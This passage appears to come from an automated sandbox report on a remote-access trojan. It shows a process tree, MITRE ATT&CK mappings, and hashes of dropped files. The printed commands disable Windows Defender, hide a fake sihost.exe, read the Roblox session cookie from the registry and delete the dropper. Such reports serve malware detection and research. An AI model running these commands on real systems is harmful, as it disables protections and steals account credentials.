      "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2372
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3300
    - - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1888
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:5304
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:4120
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:5624
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:4608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6116
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3208
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4600
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WizWormV4.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WeedClient.exe.log

Filesize
522B

MD5
acc9090417037dfa2a55b46ed86e32b8

SHA1
53fa6fb25fb3e88c24d2027aca6ae492b2800a4d

SHA256
2412679218bb0a7d05ceee32869bbb223619bde9966c4c460a68304a3367724b

SHA512
d51f7085ec147c708f446b9fb6923cd2fb64596d354ed929e125b30ace57c8cb3217589447a36960e5d3aea87a4e48aaa82c7509eced6d6c2cecd71fcfe3697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
74a6b79d36b4aae8b027a218bc6e1af7

SHA1
0350e46c1df6934903c4820a00b0bc4721779e5f

SHA256
60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

SHA512
60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4d444e4cd8a1f7d9c922d8f581fec35a

SHA1
5b260b1fc3c0d08ba8d7165a9e801ee2e0c1f50c

SHA256
0bcbe921e49d7e8ede4198c0f9e5577c3ee9e6514389b19de22bc5296935de52

SHA512
cdb484b89c2340955f35ea1d16ef5f5b96f1afb53143f413b714b512249e716fed0f9211c2638cd44862ac4b0e7c2f9d80e8868f2347023c3e65bb5a0a13825e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe

Filesize
8.2MB

MD5
2bcf4d81fc953d9abce674d4721633d4

SHA1
7310f555418c254aba6f520b2ee72fb7cebb8763

SHA256
5069ad2bcd0ef590b340cdd8be3f262c560faa17f8774664499cdf7d04cf9393

SHA512
7bfb72dd930f6346479a5e346ee817e7cecafca4ad5a4ee6a8e987c5278aa13813f3e17166d178ff957e1f23d2ecf63f01b62965e423b1d9a4be8d2b8be3b934

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe

Filesize
2.7MB

MD5
8a14259150f471ec328687c9bcedd5b1

SHA1
e8c2ae02e49c4b5d1eb8494410574ba7a5c61119

SHA256
6994b5ff8d1589088cac1984216f3d15bf42d8c04f27f2795a557565e2e94ed1

SHA512
a6d2466793a863b3b213900ec3d8b8066c409cb8b7a917bfe0c2c51f308afc94a7c08fe17d78d972f18bc0cdbef826af428250ae92007dedbbfbc85ec3d65bd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe

Filesize
21.3MB

MD5
ad2f02cf9676881547f696f59d30a816

SHA1
8c7e3e9ce36fd74db6d725fe086ff693508ab10c

SHA256
40857dd4534f369a1b94e042f794c2d0b858bb856dcff16df61bb4b66df890e5

SHA512
bee0fc3646a4967eb363e671525659187561e2be63f295295ba5635f8a2aaea1867739bda06637447348ca254f270ad9a564e1c11b70995897e238b9f749e2c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oqwatdbe.4lg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bnw7QVYJiXYdDf0

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\cxc.bat

Filesize
259KB

MD5
4e949e2528cffcf3c51c0fb9185a3b4e

SHA1
c48dc3493e75bce32680fce6ec42b11bc5cfb8c9

SHA256
ecef254e99e36a376c8fdc4dfbb99c0593b4fd2270437df3821990021278ec0a

SHA512
284be4b7215b882bb55e7df727c16628a692ce8e0dc974220e7f9b542bef9fafbb20a7db41df176e4c52142035375048638476577c594ebb8392b24346f0e619

Download Submit
C:\Users\Admin\AppData\Local\Temp\eokqDFidELFXHyi

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\eokqDFidELFXHyi

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\fSgcsd1ypXL8YYM\Display\Display.png

Filesize
423KB

MD5
c07c6712c4748d3f660c25f9bdf54822

SHA1
f5f115666a39e394ba285ec3fdfa9af7bd906f49

SHA256
819351597dcbd47b33bfeb2808e538d8bf1a5cf0525aeef1c70a59797940e9f5

SHA512
f1ce27298385a21fdaec8d789ab008fa5f8b50e9a2f6588e70c16dc8885d8f21cd86dbefb62db22d8be08054719ff377ecd33bcb806c1d1a799ce5b4e91deb7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\sihost.exe

Filesize
230KB

MD5
c44a5f5978d95c5f2267b24b29f0f512

SHA1
c9f4fd16130ed87437faa002138d36cbbfa06aaa

SHA256
55dd738b5ccada8533d959d0652cdd8f768cc183fa924424e310bb3d4d811a49

SHA512
46be2766736c4d0eb3a4a7a0b847b683fbb21747e64e4a967cf0b4798f77ecac8594f98f0b6f3d29c9f0d507bb711dee9cffabff21708357ba0a9dabf035b4fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp405F.tmp.bat

Filesize
153B

MD5
c78253c7df046b25159cce759d97d07f

SHA1
bcb230da49d83fd21966d72030d418d78ac7ae86

SHA256
99edae6d1f5e524a00c9723811be4f87f22c82802d6ad91e1792623e92418f8a

SHA512
1e7c6ebd6621707ea5afb79b7e401ff28b5586e78b3225d272c4392e7414eff7a8646b9b234c92dd77b351e2f0fbc609ad77f4b1bf23040abbe78f1aee9ac77f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4DCD.tmp.bat

Filesize
153B

MD5
cf32368de74cd81942115ff0a514ebd3

SHA1
6b8fe3bf71b713da977099da1e70d68cfcdd78dc

SHA256
321e6319b3a418a58d8dfdb89d20eeec8f4312f0fe27270e97794ab4c2bb33c4

SHA512
d38876c95b5d6bd24ca63e9c4728e94b1dc0c706fdb00e767c240ccf0cd58388b1246358fd0f00fa00a5b030c737cada06841e6033e9dc168621086d6e5cc3da

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5C44.tmp.bat

Filesize
153B

MD5
77d8bbda968eec19c5ed60c141c0db3e

SHA1
beaed7d0e4157e94b628da1bc6d48a85ab781bb5

SHA256
a54aee4d98aaf63de95f0fe122ad9fb5dd6bcb055bec21acde49a702cf216bc5

SHA512
c5e366094fd306681a80b9d66ef27f63c91e2437a804585424ccc2f76bb05c029f57753d27076e4b3061c3e00120a1eb69be68cadf93aa5457ffa970fea2ba4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\wQN1lHNZHXfYHJJ

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe

Filesize
62KB

MD5
ef0f5b80b1c07d0154d1f2bcaf9657e7

SHA1
add9257d91fe87daafaae4282452ce455c5c1ea6

SHA256
747c00322e73a64cba552cd6a3bfd1d16f31dd0c10a83f1febedc6910743f742

SHA512
28ec5b367feb915feb6b66ea3131e689477fd2f847a49c2ba3d99687895fc56d56e575e2d59763f246cca41bbdf5fbabde7a777c4cdd94b9a6c79935061118dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe

Filesize
168KB

MD5
78fa179ebcbd001b575b3baa06ff3ab2

SHA1
ef24f4ffacf974b0d5e6a2cfb3859bff1bc73f9c

SHA256
5c9c8ee0fd56497f8d1662c9d9347211761e969ab2af67d2c02ccb8588519f6e

SHA512
72e0f82e5a88b67211ac94ab134a9675f8f5c9fff092d3c2ccb4bd970e3b43d4173ec6e4c464d09e9b5bd9055ab0d816ccf07285786a2296cb154860da8e2963

Download Submit
C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe

Filesize
161KB

MD5
a69c6e092d415063a9fb80f8fe4e3444

SHA1
8b26a0fd01b1e48f7110cffecf6bc3b9d0822e9a

SHA256
f7dd8d6299c108a3221c31bf33637f59f0e19703aaa88b1e3a4f1093e7209a5d

SHA512
4e69b49d65f68ff913afbc991f06509645ac69850182f557ca625ad5cf92832059ddadb4af547cfb4fd84c4b24cf55a1ce3d9d6d466112e9581908d4e4d2da38

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/408-2457-0x0000000000DC0000-0x00000000015FE000-memory.dmp

Filesize
8.2MB

Download
memory/408-470-0x0000029675860000-0x000002967588B000-memory.dmp

Filesize
172KB

Download
memory/408-471-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/464-113-0x000002B8647C0000-0x000002B8647F2000-memory.dmp

Filesize
200KB

Download
memory/616-451-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/616-448-0x0000018FBDAD0000-0x0000018FBDAF5000-memory.dmp

Filesize
148KB

Download
memory/616-450-0x0000018FBDB00000-0x0000018FBDB2B000-memory.dmp

Filesize
172KB

Download
memory/640-43-0x000001A541E20000-0x000001A541E42000-memory.dmp

Filesize
136KB

Download
memory/640-49-0x000001A5420C0000-0x000001A5420F2000-memory.dmp

Filesize
200KB

Download
memory/640-50-0x000001A542090000-0x000001A54209E000-memory.dmp

Filesize
56KB

Download
memory/640-48-0x000001A542060000-0x000001A542068000-memory.dmp

Filesize
32KB

Download
memory/664-454-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/664-453-0x00000133C3030000-0x00000133C305B000-memory.dmp

Filesize
172KB

Download
memory/684-374-0x000000001B520000-0x000000001B534000-memory.dmp

Filesize
80KB

Download
memory/684-352-0x0000000000060000-0x0000000000076000-memory.dmp

Filesize
88KB

Download
memory/808-1645-0x0000000000BE0000-0x000000000141E000-memory.dmp

Filesize
8.2MB

Download
memory/952-464-0x000001318EFD0000-0x000001318EFFB000-memory.dmp

Filesize
172KB

Download
memory/952-465-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1016-458-0x0000014AE44F0000-0x0000014AE451B000-memory.dmp

Filesize
172KB

Download
memory/1016-459-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1032-474-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1032-473-0x0000024BF8D40000-0x0000024BF8D6B000-memory.dmp

Filesize
172KB

Download
memory/1048-468-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1048-467-0x00000190793C0000-0x00000190793EB000-memory.dmp

Filesize
172KB

Download
memory/1056-480-0x000001ACA7760000-0x000001ACA778B000-memory.dmp

Filesize
172KB

Download
memory/1056-481-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1192-483-0x0000015522970000-0x000001552299B000-memory.dmp

Filesize
172KB

Download
memory/1192-484-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1244-487-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1244-486-0x00000260596F0000-0x000002605971B000-memory.dmp

Filesize
172KB

Download
memory/1336-490-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1336-489-0x0000019E02AB0000-0x0000019E02ADB000-memory.dmp

Filesize
172KB

Download
memory/1368-494-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1368-493-0x0000022FED920000-0x0000022FED94B000-memory.dmp

Filesize
172KB

Download
memory/1388-504-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1388-503-0x000001A6004F0000-0x000001A60051B000-memory.dmp

Filesize
172KB

Download
memory/1396-507-0x00007FFF0EF70000-0x00007FFF0EF80000-memory.dmp

Filesize
64KB

Download
memory/1396-506-0x0000026EE9F90000-0x0000026EE9FBB000-memory.dmp

Filesize
172KB

Download
memory/1580-1935-0x00000000004E0000-0x0000000000D1E000-memory.dmp

Filesize
8.2MB

Download
memory/1784-2376-0x00000000001C0000-0x00000000009FE000-memory.dmp

Filesize
8.2MB

Download
memory/1796-2220-0x0000000000D60000-0x000000000159E000-memory.dmp

Filesize
8.2MB

Download
memory/1992-2368-0x0000000000E90000-0x00000000023E2000-memory.dmp

Filesize
21.3MB

Download
memory/2024-1562-0x0000000000E70000-0x00000000023C2000-memory.dmp

Filesize
21.3MB

Download
memory/2152-443-0x000001F1D5000000-0x000001F1D501C000-memory.dmp

Filesize
112KB

Download
memory/2152-446-0x000001F1D5170000-0x000001F1D517A000-memory.dmp

Filesize
40KB

Download
memory/2152-445-0x000001F1D5160000-0x000001F1D5168000-memory.dmp

Filesize
32KB

Download
memory/2152-444-0x000001F1D4DB0000-0x000001F1D4DBA000-memory.dmp

Filesize
40KB

Download
memory/2252-359-0x00007FFF4EEF0000-0x00007FFF4F0E5000-memory.dmp

Filesize
2.0MB

Download
memory/2252-360-0x00007FFF4CFE0000-0x00007FFF4D09E000-memory.dmp

Filesize
760KB

Download
memory/2372-297-0x000001CF66910000-0x000001CF66922000-memory.dmp

Filesize
72KB

Download
memory/2372-81-0x000001CF4C230000-0x000001CF4C270000-memory.dmp

Filesize
256KB

Download
memory/2372-130-0x000001CF4C790000-0x000001CF4C806000-memory.dmp

Filesize
472KB

Download
memory/2372-132-0x000001CF4C710000-0x000001CF4C72E000-memory.dmp

Filesize
120KB

Download
memory/2372-131-0x000001CF4C730000-0x000001CF4C780000-memory.dmp

Filesize
320KB

Download
memory/2372-296-0x000001CF668E0000-0x000001CF668EA000-memory.dmp

Filesize
40KB

Download
memory/2456-1535-0x0000026452D10000-0x0000026452D42000-memory.dmp

Filesize
200KB

Download
memory/2508-1760-0x0000000000B60000-0x00000000020B2000-memory.dmp

Filesize
21.3MB

Download
memory/3076-1450-0x0000000000E70000-0x00000000016AE000-memory.dmp

Filesize
8.2MB

Download
memory/3140-1404-0x0000000000CD0000-0x000000000150E000-memory.dmp

Filesize
8.2MB

Download
memory/3196-1816-0x0000000000B80000-0x00000000013BE000-memory.dmp

Filesize
8.2MB

Download
memory/3232-1644-0x0000000000740000-0x0000000000F7E000-memory.dmp

Filesize
8.2MB

Download
memory/3556-2410-0x0000000000190000-0x00000000009CE000-memory.dmp

Filesize
8.2MB

Download
memory/3624-35-0x00007FFF308B0000-0x00007FFF31371000-memory.dmp

Filesize
10.8MB

Download
memory/3624-17-0x00000000001B0000-0x0000000001702000-memory.dmp

Filesize
21.3MB

Download
memory/3624-16-0x00007FFF308B0000-0x00007FFF31371000-memory.dmp

Filesize
10.8MB

Download
memory/3624-18-0x00007FFF308B0000-0x00007FFF31371000-memory.dmp

Filesize
10.8MB

Download
memory/3792-1394-0x0000000000490000-0x00000000019E2000-memory.dmp

Filesize
21.3MB

Download
memory/3832-2252-0x0000000000570000-0x0000000001AC2000-memory.dmp

Filesize
21.3MB

Download
memory/3960-1196-0x0000000000360000-0x0000000000B9E000-memory.dmp

Filesize
8.2MB

Download
memory/4008-2120-0x0000000000D30000-0x000000000156E000-memory.dmp

Filesize
8.2MB

Download
memory/4068-1812-0x00000000003E0000-0x0000000001932000-memory.dmp

Filesize
21.3MB

Download
memory/4120-2-0x00007FFF308B0000-0x00007FFF31371000-memory.dmp

Filesize
10.8MB

Download
memory/4120-15-0x00007FFF308B0000-0x00007FFF31371000-memory.dmp

Filesize
10.8MB

Download
memory/4120-1-0x0000000000610000-0x0000000001B64000-memory.dmp

Filesize
21.3MB

Download
memory/4120-0-0x00007FFF308B3000-0x00007FFF308B5000-memory.dmp

Filesize
8KB

Download
memory/4168-315-0x0000000000F20000-0x0000000000F54000-memory.dmp

Filesize
208KB

Download
memory/4168-318-0x0000000001740000-0x0000000001766000-memory.dmp

Filesize
152KB

Download
memory/4376-1071-0x0000000000BC0000-0x0000000002112000-memory.dmp

Filesize
21.3MB

Download
memory/4412-83-0x0000000000190000-0x000000000044A000-memory.dmp

Filesize
2.7MB

Download
memory/4412-155-0x0000000004CD0000-0x0000000004D6C000-memory.dmp

Filesize
624KB

Download
memory/4460-302-0x0000000007AB0000-0x0000000007AD2000-memory.dmp

Filesize
136KB

Download
memory/4460-303-0x00000000091F0000-0x0000000009794000-memory.dmp

Filesize
5.6MB

Download
memory/4460-301-0x00000000081E0000-0x0000000008276000-memory.dmp

Filesize
600KB

Download
memory/4460-293-0x0000000008710000-0x0000000008C3C000-memory.dmp

Filesize
5.2MB

Download
memory/4700-1282-0x0000000000250000-0x0000000000A8E000-memory.dmp

Filesize
8.2MB

Download
memory/4828-187-0x0000000006350000-0x000000000636E000-memory.dmp

Filesize
120KB

Download
memory/4828-221-0x0000000007990000-0x000000000800A000-memory.dmp

Filesize
6.5MB

Download
memory/4828-222-0x0000000006840000-0x000000000685A000-memory.dmp

Filesize
104KB

Download
memory/4828-234-0x00000000081E0000-0x00000000083A2000-memory.dmp

Filesize
1.8MB

Download
memory/4828-173-0x0000000005BC0000-0x0000000005BE2000-memory.dmp

Filesize
136KB

Download
memory/4828-188-0x00000000066D0000-0x000000000671C000-memory.dmp

Filesize
304KB

Download
memory/4828-170-0x0000000004DB0000-0x0000000004DE6000-memory.dmp

Filesize
216KB

Download
memory/4828-185-0x0000000005E70000-0x00000000061C4000-memory.dmp

Filesize
3.3MB

Download
memory/4828-172-0x0000000005420000-0x0000000005A48000-memory.dmp

Filesize
6.2MB

Download
memory/4828-174-0x0000000005C90000-0x0000000005CF6000-memory.dmp

Filesize
408KB

Download
memory/4828-175-0x0000000005D00000-0x0000000005D66000-memory.dmp

Filesize
408KB

Download
memory/4844-2175-0x0000000000580000-0x0000000001AD2000-memory.dmp

Filesize
21.3MB

Download
memory/5012-36-0x00000000008D0000-0x000000000110E000-memory.dmp

Filesize
8.2MB

Download
memory/5072-1954-0x0000000000710000-0x0000000000F4E000-memory.dmp

Filesize
8.2MB

Download
memory/5240-1573-0x0000000000EF0000-0x000000000172E000-memory.dmp

Filesize
8.2MB

Download
memory/5248-1360-0x0000000000CA0000-0x00000000014DE000-memory.dmp

Filesize
8.2MB

Download
memory/5264-1839-0x000002E37CE80000-0x000002E37CEB2000-memory.dmp

Filesize
200KB

Download
memory/5268-1823-0x0000000000FE0000-0x000000000181E000-memory.dmp

Filesize
8.2MB

Download
memory/5372-2447-0x0000000000270000-0x0000000000AAE000-memory.dmp

Filesize
8.2MB

Download
memory/5424-1049-0x0000000000570000-0x0000000000DAE000-memory.dmp

Filesize
8.2MB

Download
memory/5440-2316-0x000001D0B14D0000-0x000001D0B1510000-memory.dmp

Filesize
256KB

Download
memory/5500-2269-0x00000000003E0000-0x0000000000C1E000-memory.dmp

Filesize
8.2MB

Download
memory/5552-424-0x00007FFF4CFE0000-0x00007FFF4D09E000-memory.dmp

Filesize
760KB

Download
memory/5552-423-0x00007FFF4EEF0000-0x00007FFF4F0E5000-memory.dmp

Filesize
2.0MB

Download
memory/5824-1484-0x00000000000E0000-0x0000000001632000-memory.dmp

Filesize
21.3MB

Download
memory/5888-2174-0x0000000000260000-0x0000000000A9E000-memory.dmp

Filesize
8.2MB

Download
memory/5984-1761-0x0000000000360000-0x0000000000B9E000-memory.dmp

Filesize
8.2MB

Download
memory/6020-1504-0x0000000000E60000-0x000000000169E000-memory.dmp

Filesize
8.2MB

Download
memory/6076-2122-0x0000021D06420000-0x0000021D06452000-memory.dmp

Filesize
200KB

Download
memory/6124-2059-0x0000000000940000-0x000000000117E000-memory.dmp

Filesize
8.2MB

Download
memory/6164-1493-0x0000000000510000-0x0000000000D4E000-memory.dmp

Filesize
8.2MB

Download
memory/6184-2448-0x0000000000DA0000-0x00000000022F2000-memory.dmp

Filesize
21.3MB

Download
memory/6208-2070-0x0000000000D10000-0x0000000002262000-memory.dmp

Filesize
21.3MB

Download
memory/6320-1088-0x00000000006F0000-0x0000000000F2E000-memory.dmp

Filesize
8.2MB

Download
memory/6428-1072-0x0000020CB4F20000-0x0000020CB4F60000-memory.dmp

Filesize
256KB

Download
memory/6476-1936-0x0000000000D20000-0x0000000002272000-memory.dmp

Filesize
21.3MB

Download
memory/6516-2247-0x0000000000750000-0x0000000000F8E000-memory.dmp

Filesize
8.2MB

Download
memory/6720-1167-0x00000000003E0000-0x0000000000C1E000-memory.dmp

Filesize
8.2MB

Download
memory/6728-2076-0x00000000009D0000-0x000000000120E000-memory.dmp

Filesize
8.2MB

Download
memory/6780-1572-0x00000000002F0000-0x0000000000B2E000-memory.dmp

Filesize
8.2MB

Download
memory/6860-1294-0x0000000000FF0000-0x0000000002542000-memory.dmp

Filesize
21.3MB

Download
memory/6960-1182-0x00000000003D0000-0x0000000001922000-memory.dmp

Filesize
21.3MB

Download
memory/6984-2284-0x0000000000030000-0x000000000086E000-memory.dmp

Filesize
8.2MB

Download
